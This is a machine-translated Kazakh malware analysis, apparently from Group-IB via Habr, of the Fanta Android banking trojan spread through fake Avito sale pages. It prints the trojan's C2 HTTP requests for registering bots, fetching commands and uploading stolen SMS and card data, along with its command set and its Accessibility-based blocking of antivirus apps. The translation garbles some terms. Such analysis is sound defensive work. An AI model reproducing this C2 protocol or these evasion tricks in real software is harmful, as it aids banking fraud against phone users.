🥇Leisya, Fanta: ескі Android троянының жаңа тактикасы

Бір күні сіз Avito-да бірдеңе сатқыңыз келеді және өніміңіздің егжей-тегжейлі сипаттамасын (мысалы, ЖЖҚ модулі) орналастырғаннан кейін сіз мына хабарламаны аласыз:

Сілтемені ашқаннан кейін, сізге, бақытты және табысты сатушыға сатып алу жасалғаны туралы хабарлайтын зиянсыз болып көрінетін бетті көресіз:

«Жалғастыру» түймесін басқаннан кейін Android құрылғыңызға белгішесі мен сенімді атауы бар APK файлы жүктеледі. Сіз қандай да бір себептермен AccessibilityService құқықтарын сұраған қолданбаны орнатқансыз, содан кейін бірнеше терезелер пайда болды және тез жоғалып кетті және... Осымен.

Сіз балансыңызды тексеруге барасыз, бірақ қандай да бір себептермен банктік қолданбаңыз картаңыздың мәліметтерін қайтадан сұрайды. Деректерді енгізгеннен кейін қорқынышты нәрсе орын алады: қандай да бір себептермен сізге әлі түсініксіз, ақша шотыңыздан жоғала бастайды. Сіз мәселені шешуге тырысып жатырсыз, бірақ телефоныңыз қарсылық көрсетеді: ол «Артқа» және «Үй» пернелерін басады, өшпейді және ешқандай қауіпсіздік шараларын белсендіруге мүмкіндік бермейді. Соның салдарынан ақшасыз қалдыңыз, тауарыңыз алынбады, абдырап: не болды?

Жауап қарапайым: сіз Flexnet отбасының мүшесі Android троянының Fanta құрбаны болдыңыз. Бұл қалай болды? Енді түсіндіріп көрейік.

Авторлар: Андрей Половинкин, зиянды бағдарламаларды талдау бойынша кіші маман, Иван Писарев, зиянды бағдарламаларды талдау бойынша маман.

Кейбір статистика

Android трояндарының Flexnet отбасы алғаш рет 2015 жылы белгілі болды. Ұзақ қызмет ету кезеңінде отбасы бірнеше кіші түрлерге дейін кеңейді: Fanta, Limebot, Lipton және т. Троян, сондай-ақ онымен байланысты инфрақұрылым бір орында тұрмайды: жаңа тиімді тарату схемалары әзірленуде - біздің жағдайда нақты пайдаланушы-сатушыға бағытталған жоғары сапалы фишингтік беттер, ал трояндық әзірлеушілер сәнді трендтерді ұстанады. вирус жазу - жұқтырған құрылғылардан ақшаны тиімдірек ұрлауға және қорғау механизмдерін айналып өтуге мүмкіндік беретін жаңа функцияларды қосу.

Осы мақалада сипатталған науқан Ресейден келген пайдаланушыларға бағытталған, вирус жұқтырған құрылғылардың аз саны Украинада, ал Қазақстан мен Беларусьте одан да аз.

Flexnet Android трояндық аренада 4 жылдан астам уақыт болғанымен және көптеген зерттеушілер егжей-тегжейлі зерттегенімен, ол әлі де жақсы жағдайда. 2019 жылдың қаңтарынан бастап ықтимал шығын көлемі 35 миллион рубльден асады - бұл тек Ресейдегі науқандарға арналған. 2015 жылы осы Android троянының әртүрлі нұсқалары астыртын форумдарда сатылды, мұнда егжей-тегжейлі сипаттамасы бар троянның бастапқы кодын табуға болады. Демек, әлемдегі шығын статистикасы бұдан да әсерлі. Сондай қария үшін жаман көрсеткіш емес пе?

Сатудан бастап алдауға дейін

Avito жарнамаларын орналастыруға арналған интернет-сервиске арналған фишингтік беттің бұрын ұсынылған скриншотынан көрініп тұрғандай, ол белгілі бір жәбірленуші үшін дайындалған. Шамасы, шабуылдаушылар Avito талдаушыларының бірін пайдаланады, ол телефон нөмірін және сатушының атын, сондай-ақ өнім сипаттамасын шығарады. Бетті кеңейтіп, APK файлын дайындағаннан кейін жәбірленушіге оның аты-жөні және оның өнімінің сипаттамасы мен өнімді «сатудан» алынған соманы қамтитын фишингтік бетке сілтеме бар SMS жіберіледі. Түймені басу арқылы пайдаланушы зиянды APK файлын алады - Fanta.

shcet491[.]ru доменін зерттеу оның Hostinger DNS серверлеріне берілгенін көрсетті:

ns1.hostinger.ru
ns2.hostinger.ru
ns3.hostinger.ru
ns4.hostinger.ru

Домен аймағы файлында 31.220.23[.]236, 31.220.23[.]243 және 31.220.23[.]235 IP мекенжайларын көрсететін жазбалар бар. Дегенмен, доменнің негізгі ресурс жазбасы (A жазбасы) 178.132.1[.]240 IP мекенжайы бар серверді көрсетеді.

IP мекенжайы 178.132.1[.]240 Нидерландыда орналасқан және хосттерге тиесілі WorldStream. 31.220.23[.]235, 31.220.23[.]236 және 31.220.23[.]243 IP мекенжайлары Ұлыбританияда орналасқан және HOSTINGER ортақ хостинг серверіне жатады. Жазушы ретінде пайдаланылады openprov-ru. Келесі домендер де 178.132.1[.]240 IP мекенжайына шешілді:

sdelka-ru[.]ru
tovar-av[.]ru
ав-товар[.]ру
ru-sdelka[.]ru
shcet382[.]ru
sdelka221[.]ru
sdelka211[.]ru
vyplata437[.]ru
viplata291[.]ru
perevod273[.]ru
perevod901[.]ru

Айта кету керек, келесі форматтағы сілтемелер барлық дерлік домендерден қолжетімді болды:

http://(www.){0,1}<%domain%>/[0-9]{7}

Бұл үлгіде SMS хабарламасының сілтемесі де бар. Тарихи деректерге сүйене отырып, бір домен жоғарыда сипатталған үлгідегі бірнеше сілтемелерге сәйкес келетіні анықталды, бұл бір домен троянды бірнеше құрбандарға тарату үшін пайдаланылғанын көрсетеді.

Біраз алға ұмтылайық: SMS сілтемесі арқылы жүктелген троян мекенжайды басқару сервері ретінде пайдаланады. onsedseddohap[.]клуб. Бұл домен 2019 жылы тіркелді және 03 бастап APK қолданбалары осы доменмен әрекеттесті. VirusTotal алынған деректер негізінде барлығы 12 қолданба осы сервермен әрекеттесті. Доменнің өзі IP мекенжайына шешілді 217.23.14[.]27, Нидерландыда орналасқан және хосттерге тиесілі WorldStream. Жазушы ретінде пайдаланылады парақша. Домендер де осы IP мекенжайына шешілді bad-racoon[.]клуб (2018 ж. бастап) және bad-racoon[.]тірі (2018 ж. бастап). Доменмен bad-racoon[.]клуб өзара әрекеттескен 80-ден астам APK файлдары bad-racoon[.]тірі - 100-ден астам.

Жалпы, шабуыл келесідей дамиды:

Фанта қақпағының астында не бар?

Көптеген басқа Android трояндары сияқты, Fanta SMS хабарламаларын оқуға және жіберуге, USSD сұрауларын жасауға және қолданбалардың (соның ішінде банктік терезелер) үстінде өз терезелерін көрсетуге қабілетті. Дегенмен, бұл отбасының функционалдық арсеналы келді: Fanta қолдана бастады AccessibilityService әртүрлі мақсаттарда: басқа қолданбалардан хабарландырулардың мазмұнын оқу, вирус жұққан құрылғыда троянды анықтау және орындауды тоқтату және т.б. Fanta Android жүйесінің 4.4 жастан кіші емес барлық нұсқаларында жұмыс істейді. Бұл мақалада біз келесі Fanta үлгісін егжей-тегжейлі қарастырамыз:

MD5: 0826bd11b2c130c4c8ac137e395ac2d4
SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Іске қосылғаннан кейін бірден

Іске қосылғаннан кейін троян өзінің белгішесін жасырады. Қолданба вирус жұққан құрылғының аты тізімде болмаса ғана жұмыс істей алады:

android_x86
Virtualbox
Nexus 5X(қорықшасы)
Nexus 5 (ұстара)

Бұл тексеру троянның негізгі қызметінде жүзеге асырылады - Негізгі қызмет. Алғаш рет іске қосылған кезде қолданбаның конфигурация параметрлері әдепкі мәндерге инициализацияланады (конфигурация деректерін сақтау пішімі және олардың мағынасы кейінірек талқыланады) және жаңа вирус жұққан құрылғы басқару серверінде тіркеледі. Хабарлама түрі бар HTTP POST сұрауы серверге жіберіледі тіркелу_бот және вирус жұққан құрылғы туралы ақпарат (Android нұсқасы, IMEI, телефон нөмірі, оператордың аты және оператор тіркелген елдің коды). Адрес басқару сервері ретінде қызмет етеді hXXp://onuseseddohap[.]club/controller.php. Жауап ретінде сервер өрістерді қамтитын хабарлама жібереді bot_id, bot_pwd, сервер — қолданба бұл мәндерді CnC серверінің параметрлері ретінде сақтайды. Параметр сервер өріс алынбаған жағдайда міндетті емес: Fanta тіркеу мекенжайын пайдаланады - hXXp://onuseseddohap[.]club/controller.php. CnC мекенжайын өзгерту функциясы екі мәселені шешу үшін пайдаланылуы мүмкін: жүктемені бірнеше серверлер арасында біркелкі бөлу (егер вирус жұққан құрылғылардың көп саны болса, оңтайландырылмаған веб-серверге жүктеме жоғары болуы мүмкін), сонымен қатар пайдалану балама сервер CnC серверлерінің бірі істен шыққан жағдайда.

Сұрауды жіберу кезінде қате орын алса, троян тіркеу процесін 20 секундтан кейін қайталайды.

Құрылғы сәтті тіркелгеннен кейін Fanta пайдаланушыға келесі хабарламаны көрсетеді:

Маңызды ескерту: қызмет шақырылды Жүйе қауіпсіздігі — трояндық қызметтің атауы және түймені басқаннан кейін OK Вирус жұққан құрылғының Арнайы мүмкіндіктер параметрлері бар терезе ашылады, мұнда пайдаланушы зиянды қызметке Арнайы мүмкіндіктер құқықтарын беруі керек:

Пайдаланушы қосыла салысымен AccessibilityService, Fanta қолданба терезелерінің мазмұнына және оларда орындалатын әрекеттерге қол жеткізе алады:

Арнайы мүмкіндіктер құқықтарын алғаннан кейін троян әкімші құқықтары мен хабарландыруларды оқу құқықтарын сұрайды:

AccessibilityService қызметін пайдалана отырып, қолданба пернелерді басуларды имитациялайды, осылайша өзіне барлық қажетті құқықтарды береді.

Fanta конфигурация деректерін, сондай-ақ вирус жұққан құрылғы туралы процесте жиналған ақпаратты сақтау үшін қажетті бірнеше дерекқор даналарын жасайды (олар кейінірек сипатталады). Жиналған ақпаратты жіберу үшін троян деректер қорынан өрістерді жүктеуге және басқару серверінен пәрменді алуға арналған қайталанатын тапсырманы жасайды. CnC-ге кіру аралығы Android нұсқасына байланысты орнатылады: 5.1 жағдайында интервал 10 секунд, әйтпесе 60 секунд болады.

Команданы алу үшін Fanta сұрау жасайды Тапсырманы алу басқару серверіне. Жауап ретінде CnC келесі пәрмендердің бірін жібере алады:

команда	сипаттамасы
0	SMS хабарлама жіберу
1	Телефон қоңырауын немесе USSD пәрменін жасаңыз
2	Параметрді жаңартады интервал
3	Параметрді жаңартады үзіліс
6	Параметрді жаңартады smsManager
9	SMS хабарламаларды жинауды бастаңыз
11	Телефонды зауыттық параметрлерге қайтарыңыз
12	Тілқатысу терезесін жасау журналын қосу/өшіру

Fanta сонымен қатар 70 банктік қолданбалардан, жылдам төлем жүйелерінен және электрондық әмияндардан хабарландыруларды жинап, оларды дерекқорда сақтайды.

Конфигурация параметрлерін сақтау

Конфигурация параметрлерін сақтау үшін Fanta Android платформасы үшін стандартты тәсілді пайдаланады - Басымдықтар-файлдар. Параметрлер аталған файлға сақталады параметрлері. Сақталған параметрлердің сипаттамасы төмендегі кестеде берілген.

Аты	Әдепкі мән	Мүмкін мәндер	сипаттамасы
id	0	бүтін	Бот идентификаторы
сервер	hXXp://onuseseddohap[.]club/	URL	Сервер мекенжайын басқару
pwd	-	String	Сервер құпия сөзі
интервал	20	бүтін	Уақыт аралығы. Келесі тапсырмаларды қанша уақытқа кейінге қалдыру керектігін көрсетеді: Жіберілген SMS-хабарламаның күйі туралы сұрау жіберу кезінде Басқару серверінен жаңа пәрменді алу
үзіліс	барлық	барлығы/тел нөмірі	Егер өріс жолға тең болса барлық немесе тел нөмірі, содан кейін қабылданған SMS хабарламаны қолданба ұстап алады және пайдаланушыға көрсетілмейді
smsManager	0	0/1	Қолданбаны әдепкі SMS алушы ретінде қосу/өшіру
ReadDialog	жалған	Шын/жалған	Оқиғаларды тіркеуді қосу/өшіру AccessibilityEvent

Fanta файлды да пайдаланады smsManager:

Аты	Әдепкі мән	Мүмкін мәндер	сипаттамасы
pckg	-	String	Пайдаланылған SMS хабарлама менеджерінің аты

Мәліметтер қорымен өзара әрекеттесу

Троян өз жұмысы барысында екі мәліметтер қорын пайдаланады. Мәліметтер қоры аталды a телефоннан жиналған әртүрлі ақпаратты сақтау үшін қолданылады. Екінші дерекқор аталды fanta.db және банк карталары туралы ақпаратты жинауға арналған фишинг терезелерін жасауға жауапты параметрлерді сақтау үшін пайдаланылады.

Троян дерекқорды пайдаланады а жиналған ақпаратты сақтау және әрекеттеріңізді тіркеу үшін. Деректер кестеде сақталады журналдар. Кестені құру үшін келесі SQL сұрауын пайдаланыңыз:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Деректер базасы келесі ақпаратты қамтиды:

1. Хабарлама арқылы вирус жұққан құрылғының іске қосылуын тіркеу Телефон қосылды!

2. Қолданбалардан хабарландырулар. Хабарлама келесі үлгі бойынша жасалады:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Троян жасаған фишингтік пішіндердегі банктік карта деректері. Параметр VIEW_NAME төмендегілердің бірі болуы мүмкін:

AliExpress
Авито
Google Play
Әртүрлі

Хабарлама келесі форматта тіркеледі:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Пішімдегі кіріс/шығыс SMS хабарламалары:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Пішімдегі диалогтық терезені жасайтын бума туралы ақпарат:

(<%Package name%>)<%Package information%>

Мысал кесте журналдар:

Fanta функционалдық мүмкіндіктерінің бірі - банк карталары туралы ақпаратты жинау. Деректерді жинау банктік қосымшаларды ашу кезінде фишингтік терезелерді жасау арқылы жүзеге асады. Троян фишинг терезесін тек бір рет жасайды. Терезе пайдаланушыға көрсетілген ақпарат кестеде сақталады параметрлері мәліметтер базасында fanta.db. Дерекқорды жасау үшін келесі SQL сұрауын пайдаланыңыз:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Барлық кесте өрістері параметрлері әдепкі бойынша 1-ге инициализацияланған (фишинг терезесін жасау). Пайдаланушы өз деректерін енгізгеннен кейін мән 0 мәніне орнатылады. Кесте өрістерінің мысалы параметрлері:

can_login — өріс банктік өтінімді ашу кезінде пішінді көрсетуге жауап береді
бірінші_банк - қолданылмайды
can_avito — өріс Avito қолданбасын ашу кезінде пішінді көрсетуге жауапты
can_ali — өріс Aliexpress қосымшасын ашу кезінде пішінді көрсетуге жауап береді
басқа_болуы мүмкін — өріс тізімнен кез келген қосымшаны ашқан кезде пішінді көрсетуге жауапты: Yula, Pandao, Drom Auto, Wallet. Жеңілдік және бонустық карталар, Aviasales, Booking, Trivago
can_card — өріс ашу кезінде пішінді көрсетуге жауап береді Google Play

Басқару серверімен өзара әрекеттесу

Басқару серверімен желілік өзара әрекеттесу HTTP протоколы арқылы жүзеге асады. Желімен жұмыс істеу үшін Fanta танымал Retrofit кітапханасын пайдаланады. Өтініштер мына мекенжайға жіберіледі: hXXp://onuseseddohap[.]club/controller.php. Серверде тіркелу кезінде сервер мекенжайын өзгертуге болады. Cookie файлдары серверден жауап ретінде жіберілуі мүмкін. Fanta серверге келесі сұрауларды жасайды:

Боттың басқару серверінде тіркелуі бірінші іске қосылғаннан кейін бір рет орындалады. Вирус жұққан құрылғы туралы келесі деректер серверге жіберіледі:
· Cookie — серверден алынған cookie файлдары (әдепкі мән – бос жол)
· режимі — жол тұрақтысы тіркелу_бот
· префикс — бүтін тұрақты 2
· version_sdk — келесі үлгі бойынша құрылады: /(Avit)
· IMEI — жұқтырған құрылғының IMEI
· ел — оператор тіркелген елдің коды, ISO форматында
· нөмір - телефон нөмірі
· оператор — оператордың аты

Серверге жіберілген сұраудың мысалы:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
```
Сұранысқа жауап ретінде сервер келесі параметрлерді қамтитын JSON нысанын қайтаруы керек:
· bot_id — жұқтырған құрылғының идентификаторы. Егер bot_id 0-ге тең болса, Fanta сұрауды қайта орындайды.
bot_pwd — серверге арналған құпия сөз.
сервер — сервер адресін басқару. Қосымша параметр. Егер параметр көрсетілмесе, қолданбада сақталған мекенжай пайдаланылады.

JSON нысанының мысалы:
```
{
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}
```

Серверден пәрмен алуды сұрау. Келесі деректер серверге жіберіледі:
· Cookie — серверден алынған cookie файлдары
· өтінім — сұрауды жіберу кезінде алынған вирус жұққан құрылғының идентификаторы тіркелу_бот
· pwd — серверге арналған құпия сөз
· divice_admin — өріс әкімші құқықтарының алынғанын анықтайды. Әкімші құқықтары алынған болса, өріс тең болады 1басқаша 0
· Арнайы мүмкіндіктер — Қол жетімділік қызметінің жұмыс күйі. Қызмет іске қосылған болса, мән 1басқаша 0
· SMSManager — троянның SMS қабылдауға арналған әдепкі қолданба ретінде қосылғанын көрсетеді
· экран — экранның қандай күйде екенін көрсетеді. Мән орнатылады 1, экран қосулы болса, әйтпесе 0;

Серверге жіберілген сұраудың мысалы:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
```
Пәрменге байланысты сервер әртүрлі параметрлері бар JSON нысанын қайтара алады:

· команда SMS хабарлама жіберу: Параметрлерде телефон нөмірі, SMS хабарлама мәтіні және жіберілетін хабарламаның идентификаторы бар. Идентификатор түрі бар серверге хабарлама жіберу кезінде қолданылады setSmsStatus.
```
{
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}
```
· команда Телефон қоңырауын немесе USSD пәрменін жасаңыз: Телефон нөмірі немесе пәрмен жауап мәтінінде келеді.
```
{
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}
```
· команда Интервал параметрін өзгерту.
```
{
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}
```
· команда Intercept параметрін өзгерту.
```
{
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}
```
· команда SmsManager өрісін өзгерту.
```
{
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```
· команда Вирус жұққан құрылғыдан SMS хабарларын жинаңыз.
```
{
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}
```
· команда Телефонды зауыттық параметрлерге қайтарыңыз:
```
{
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}
```
· команда ReadDialog параметрін өзгертіңіз.
```
{
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```

Түрі бар хабарлама жіберу setSmsStatus. Бұл сұраныс команда орындалғаннан кейін жасалады SMS хабарлама жіберу. Сұраныс келесідей көрінеді:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

Дерекқор мазмұнын жүктеп салу. Бір сұрау үшін бір жол жіберіледі. Келесі деректер серверге жіберіледі:
· Cookie — серверден алынған cookie файлдары
· режимі — жол тұрақтысы SetSaveInboxSms
· өтінім — сұрауды жіберу кезінде алынған вирус жұққан құрылғының идентификаторы тіркелу_бот
· мәтін — ағымдағы дерекқор жазбасындағы мәтін (өріс d үстелден журналдар мәліметтер базасында а)
· нөмір — ағымдағы дерекқор жазбасының атауы (өріс p үстелден журналдар мәліметтер базасында а)
· sms_режимі — бүтін мән (өріс m үстелден журналдар мәліметтер базасында а)

Сұраныс келесідей көрінеді:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
```
Серверге сәтті жіберілсе, жол кестеден жойылады. Сервер қайтарған JSON нысанының мысалы:
```
{
    "response":[],
    "status":"ok"
}
```

AccessibilityService қызметімен өзара әрекеттесу

AccessibilityService мүмкіндігі шектеулі адамдар үшін Android құрылғыларын пайдалануды жеңілдету үшін енгізілді. Көп жағдайда қолданбамен әрекеттесу үшін физикалық әрекеттесу қажет. AccessibilityService оларды бағдарламалы түрде орындауға мүмкіндік береді. Fanta бұл қызметті банктік қолданбаларда жалған терезелер жасау және пайдаланушылардың жүйе параметрлері мен кейбір қолданбаларды ашуына жол бермеу үшін пайдаланады.

AccessibilityService функционалдығын пайдалана отырып, троян вирус жұққан құрылғының экранындағы элементтердің өзгерістерін бақылайды. Бұрын сипатталғандай, Fanta параметрлері диалогтық терезелермен операцияларды тіркеуге жауапты параметрді қамтиды - ReadDialog. Бұл параметр орнатылса, оқиғаны тудырған буманың аты мен сипаттамасы туралы ақпарат дерекқорға қосылады. Оқиғалар іске қосылғанда троян келесі әрекеттерді орындайды:

Келесі жағдайларда артқы және үй пернелерін басуды имитациялайды:
· егер пайдаланушы өз құрылғысын қайта жүктегісі келсе
· егер пайдаланушы «Avito» қолданбасын жойғысы келсе немесе кіру құқықтарын өзгерткісі келсе
· бетте «Avito» қолданбасы туралы айтылған болса
· Google Play Protect қолданбасын ашқанда
· AccessibilityService параметрлерімен беттерді ашқанда
· Жүйе қауіпсіздігі тілқатысу терезесі пайда болғанда
· «Басқа қолданбаның үстінен сызу» параметрлері бар бетті ашқанда
· «Қолданбалар» бетін ашқанда «Қалпына келтіру және қалпына келтіру», «Деректерді қалпына келтіру», «Параметрлерді қалпына келтіру», «Әзірлеуші тақтасы», «Арнайы. мүмкіндіктер», «Арнайы мүмкіндіктер», «Арнайы құқықтар»
· егер оқиға белгілі бір қолданбалармен жасалған болса.

Қолданбалар тізімі
- андроид
- Master Lite
- Таза шебер
- x86 процессорына арналған Clean Master
- Meizu қолданбасының рұқсаттарын басқару
- MIUI қауіпсіздігі
- Clean Master - антивирус, кэш және қоқыс тазартқыш
- Ата-ана бақылауы және GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security бета нұсқасы
- Вирустарды тазартқыш, антивирус, тазартқыш (MAX қауіпсіздік)
- Мобильді антивирустық қауіпсіздік PRO
- Avast антивирусы және тегін қорғау 2019
- MegaFon ұялы қауіпсіздігі
- Xperia үшін AVG қорғанысы
- Мобильді қауіпсіздік
- Malwarebytes антивирусы және қорғанысы
- Android 2019 үшін антивирус
- Қауіпсіздік шебері - Антивирус, VPN, AppLock, Booster
- Huawei планшеттік жүйе менеджеріне арналған AVG антивирусы
- Samsung қол жетімділігі
- Samsung Smart Manager
- Қауіпсіздік шебері
- Жылдамдықты күшейткіш
- Dr.Web
- Dr.Web қауіпсіздік кеңістігі
- Dr.Web мобильді басқару орталығы
- Dr.Web Security Space Life
- Dr.Web мобильді басқару орталығы
- Антивирус және мобильді қауіпсіздік
- Kaspersky Internet Security: антивирус және қорғаныс
- Kaspersky батареясының қызмет ету мерзімі: үнемдеу және күшейткіш
- Kaspersky Endpoint Security - қорғау және басқару
- AVG Antivirus тегін 2019 – Android үшін қорғаныс
- Антивирус Android
- Norton Mobile Security және антивирус
- Антивирус, желіаралық қалқан, VPN, мобильді қауіпсіздік
- Мобильді қауіпсіздік: антивирус, VPN, ұрлықтан қорғау
- Android үшін антивирус
Қысқа нөмірге SMS хабарлама жіберген кезде рұқсат сұралса, Fanta құсбелгісін басуды ұқсатады. Таңдауды есте сақтаңыз және түймені басыңыз жіберіңіз.
Трояннан әкімші құқықтарын алып тастауға әрекеттенгенде, ол телефон экранын құлыптайды.
Жаңа әкімшілерді қосуға жол бермейді.
Егер антивирус қолданбасы болса dr.web қауіпті анықтаған кезде, Fanta түймені басқанда еліктейді елемеу.
Троян, егер оқиға қолданба арқылы жасалған болса, «Артқа» және «Үйге» түймелерін басуды имитациялайды Samsung құрылғысының күтімі.
Fanta 30-ға жуық әртүрлі Интернет қызметтерінің тізімінен қосымша іске қосылған болса, банк карталары туралы ақпаратты енгізу пішіндері бар фишинг терезелерін жасайды. Олардың ішінде: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto және т.б.

Фишинг пішіндері

Fanta вирус жұққан құрылғыда қандай қолданбалардың жұмыс істеп тұрғанын талдайды. Қызығушылықты білдіретін қосымша ашылған болса, троян барлық басқалардың үстіне фишинг терезесін көрсетеді, ол банк картасының ақпаратын енгізуге арналған пішін болып табылады. Пайдаланушы келесі деректерді енгізуі керек:
- Карта нөмірі
- Картаның жарамдылық мерзімі
- CVV
- Карта ұстаушысының аты (барлық банктер үшін емес)
Жұмыс істеп тұрған қолданбаға байланысты әртүрлі фишинг терезелері көрсетіледі. Төменде олардың кейбірінің мысалдары келтірілген:

AliExpress:

Авито:

Кейбір басқа қолданбалар үшін, мысалы. Google Play Market, Aviasales, Pandao, Booking, Trivago:

Бұл шынымен қалай болды

Бақытымызға орай, мақаланың басында сипатталған SMS-хабарламаны алған адам киберқауіпсіздік маманы болып шықты. Сондықтан, нақты, режиссер емес нұсқасы бұрын айтылғаннан ерекшеленеді: адам қызықты SMS алды, содан кейін ол оны Group-IB Threat Hunting Intelligence тобына берді. Шабуылдың нәтижесі - осы мақала. Бақытты аяқталды, солай ма? Дегенмен, барлық оқиғалар соншалықты сәтті аяқталмайды және сіздікі ақшаны жоғалтумен режиссердің кесірі сияқты көрінбеуі үшін көп жағдайда келесі ұзақ сипатталған ережелерді ұстану жеткілікті:
- Android операциялық жүйесі бар мобильді құрылғыға Google Play-ден басқа кез келген көздерден қолданбаларды орнатпаңыз
- Қолданбаны орнату кезінде қолданба сұраған құқықтарға ерекше назар аударыңыз
- жүктелген файлдардың кеңейтіміне назар аударыңыз
- Android ОЖ жаңартуларын жүйелі түрде орнатыңыз
- күдікті ресурстарға кірмеңіз және ол жерден файлдарды жүктеп алмаңыз
- SMS хабарламаларында алынған сілтемелерді баспаңыз.

Ақпарат көзі: www.habr.com

Leysya, Fanta: ескі Android троянына арналған жаңа тактика